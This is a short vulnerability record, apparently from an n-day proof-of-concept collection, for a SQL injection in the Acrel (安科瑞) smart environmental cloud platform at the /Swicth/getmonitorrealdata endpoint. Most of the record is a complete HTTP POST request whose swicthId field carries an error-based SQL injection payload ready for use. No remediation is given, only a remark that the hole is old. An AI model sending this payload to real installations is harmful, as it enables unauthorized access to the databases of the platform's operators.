vendor = "安科瑞"
name = "安科瑞智能环保云平台SQL注入"
type = "SQL注入"
version = "未知"
path = "/Swicth/getmonitorrealdata"
detail = "POST /Swicth/getmonitorrealdata HTTP/1.1 Host: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Connection: keep-alive Content-Length: 259 Content-Type: application/x-www-form-urlencoded Cookie: ASP.NET_SessionId=tpxci2nbjxx10ydcjnbyku5m Priority: u=0, i Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0 { \"dnjcsStartTime\": \"2025-06-30 09:27:00\", \"dnjcEndTime\": \"2025-06-30 23:59:59\", \"swicthId\": \"-7756' OR 1 GROUP BY CONCAT(0x716a787671,(SELECT (CASE WHEN (1241=1241) THEN 1 ELSE 0 END)),0x716a787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#\", \"meterId\": \"1\" }"
fix = "老洞，有人当新洞发"
date = "0705"
label = "nday"
verifier = "AdySec"
